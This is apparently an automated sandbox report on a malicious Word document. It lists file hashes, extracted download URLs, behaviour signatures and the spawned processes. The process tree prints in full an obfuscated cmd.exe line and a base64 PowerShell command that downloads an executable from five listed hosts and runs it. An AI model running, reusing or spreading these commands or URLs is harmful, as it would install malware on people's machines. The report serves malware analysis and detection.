Analysis
-
max time kernel
101s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
11/05/2024, 09:28
General
-
Target
33e63037b35ee989f9ac8cb0f7492ca2_JaffaCakes118.doc
-
Size
86KB
-
MD5
33e63037b35ee989f9ac8cb0f7492ca2
-
SHA1
db115013c56aa86326cc5a2f2bf8abb2febab111
-
SHA256
bbdfa6d962aad1150dde37e48a8d357c2ca792f938c810e6c21354c4daaa2442
-
SHA512
32f379bb79c8d9ddf181e389bb51862c24ebf0bfc033c4314f651e955784363205794e7f7bdec2ee393d8506517626c7510ba71860bdab472d234bd23c0b1a32
-
SSDEEP
1536:JptJlmrJpmxlRw99NBO+aANIrlnKchqXN076KC0It4oC:3te2dw99fD2vR1It4
Malware Config
Extracted
http://aliu-rdc.org/QwWKYJxM
http://2idiotsandnobusinessplan.com/wC7
http://7naturalessences.com/DFaSvtrS
http://benimdunyamkres.com/v0vig1G1
http://hostmktar.com/mP
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\33e63037b35ee989f9ac8cb0f7492ca2_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\CMd.exeCMd /v/r " ^sE^T ^ ^h^q^x==^=^A^Ag^AA^I^AACA^g^AA^IAAC^A^g^AAIAAC^A^gA^A^I^A^ACAg^AA^I^AACAgA^AI^A^0^H^A9Bw^e^Ag^G^AjBA^dAEGA^jBQf^As^D^ArB^QYA^UG^Ay^B^g^Y^As^D^A^O^B^wQ^A^Y^E^A^k^AAI^A0GA^lB^A^d^A^k^EAt^AQZ^AsGAvB^g^d^A^4G^AJ^Bw^OA^kC^AOBw^QAYEA^kAA^IAwCATB^Aa^AY^E^A^k^AAK^AUG^A^s^B^QaAYE^AkBQ^YA8^G^As^BgbAcHAv^B^AR^A^4C^A^y^BQ^Q^A^o^G^AkAweA^kH^A^y^B^A^dA^s^HAp^A^gT^A8^GA^GB^AJA^ACA^uBQ^a^A^ACATBAa^AYE^A^k^A^A^KAgG^A^jB^QYA^UG^AyBwbAY^GA^7^A^wJA^U^G^A4^B^QZA^4CAn^AwKAYGA2^B^A^U^A^QC^ArAwJ^Aw^FAn^A^wK^A^M^GA^pBA^b^A^I^G^A1B^AcAoD^A^2^Bg^b^A^U^GA^kAQPA4E^AD^B^gR^AQCA^7Aw^J^A^ADA^x^A^wN^AcCA^g^A^Q^P^A^ACAmBg^dAA^F^A^k^AwO^A^kC^AnAA^QAcCAoA^Ad^AkG^A^sBAc^AMFA^u^Aw^JAAF^A^t^B^wL^A0GAv^Bw^YA^4CAyBQ^YAQHAr^B^Q^bA^Q^HAzB^w^bAg^GAvAw^LA^o^DA^w^B^AdA^QHA^o^BAQAED^A^HBQM^AcGAp^Bgd^A^A^DA2^BwL^A0^GAvB^w^Y^A4C^AzBQZ^AI^HArB^Q^bA^EGA^5B^g^b^A^UH^Ak^BQb^Ak^GAuBQ^ZA^I^G^Av^AwL^A^oD^A^w^BAdA^Q^H^A^o^BAQ^A^MF^AyB^A^dA^YH^ATBQY^A^YE^AE^B^wLA^0^G^AvBw^Y^A^4C^Az^BQ^ZAMGAu^B^Q^Z^AMH^AzB^Q^ZAw^G^A^h^Bgc^A^UH^A0B^QYA4^GA^3Aw^L^A8CA6A^Ac^AQ^H^A0^B^A^a^AA^E^A3^A^wQ^AcH^AvAQ^b^A^8^G^A^j^B^g^LA4^G^AhBAb^AA^H^A^z^B^wc^A^U^GA^uB^Qa^A^MHA1B^g^YA^8G^A^uBA^ZA4G^Ah^B^wc^A^QHAvB^Qa^AQ^GA^p^B^g^M^A^8CAv^A^g^O^AAHA0BA^d^A^gG^A^ABQ^T^AgHA^KB^QW^A^sEAX^Bwd^A^EF^Av^A^wZ^A^I^H^AvB^g^LAM^GA^k^BgcA0C^A1B^Q^a^A^wG^A^h^B^w^L^A^8C^A^6^AAcA^QHA^0^BA^a^AcCA9^A^g^T^A^8^G^AG^B^A^J^AsD^A^0BgbA^U^G^Ap^BAb^AM^EAi^BQ^Z^AcFAu^A^AdAU^GA^O^BAIA^QH^A^j^BQZ^A^o^GAi^B^w^bA^0C^A^3BQZA^4^GA^9A^gc^AEEAqB^AJ ^e- ^l^le^h^sr^ewop& ^F^Or /^l %^Y ^In (^ ^9^8^9^ ^ ^ ^-^1 ^0)D^O ^s^E^t u^j^L^a=!u^j^L^a!!^h^q^x:~%^Y, 1!&^iF %^Y == ^0 CA^L^L %u^j^L^a:~^-^99^0% "2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABqAEEAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABGAG8ATgA9ACcAaAB0AHQAcAA6AC8ALwBhAGwAaQB1AC0AcgBkAGMALgBvAHIAZwAvAFEAdwBXAEsAWQBKAHgATQBAAGgAdAB0AHAAOgAvAC8AMgBpAGQAaQBvAHQAcwBhAG4AZABuAG8AYgB1AHMAaQBuAGUAcwBzAHAAbABhAG4ALgBjAG8AbQAvAHcAQwA3AEAAaAB0AHQAcAA6AC8ALwA3AG4AYQB0AHUAcgBhAGwAZQBzAHMAZQBuAGMAZQBzAC4AYwBvAG0ALwBEAEYAYQBTAHYAdAByAFMAQABoAHQAdABwADoALwAvAGIAZQBuAGkAbQBkAHUAbgB5AGEAbQBrAHIAZQBzAC4AYwBvAG0ALwB2ADAAdgBpAGcAMQBHADEAQABoAHQAdABwADoALwAvAGgAbwBzAHQAbQBrAHQAYQByAC4AYwBvAG0ALwBtAFAAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAAdgBmACAAPQAgACcANwAxADAAJwA7ACQARgBDAE4APQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUAB2AGYAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAaABTACAAaQBuACAAJABGAG8ATgApAHsAdAByAHkAewAkAGoAQQByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEYAaABTACwAIAAkAEYAQwBOACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEYAQwBOADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB